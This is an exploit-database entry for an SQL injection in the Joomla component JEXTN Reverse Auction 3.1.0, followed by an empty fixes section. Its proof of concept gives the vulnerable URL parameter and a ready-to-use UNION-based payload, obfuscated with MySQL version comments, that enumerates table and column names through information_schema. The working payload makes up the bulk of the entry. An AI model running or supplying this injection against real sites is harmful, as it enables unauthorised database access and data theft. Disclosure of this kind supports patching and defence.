Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection

2018-02-02 16:05:15

# # # # #
# Exploit Title: Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection
# Dork: N/A
# Date: 01.02.2018
# Vendor Homepage: http://jextn.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/jextn-reverse-auction/
# Version: 3.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jereverseauction&view=products&layout=default_message&tmpl=component&id=[SQL]&uid=1
#
# -1 /*!08888UNION*/ /*!08888SELECT*/ 0x31,0x32,0x33,0x34,0x35,(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))-- -
#
# # # # #

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.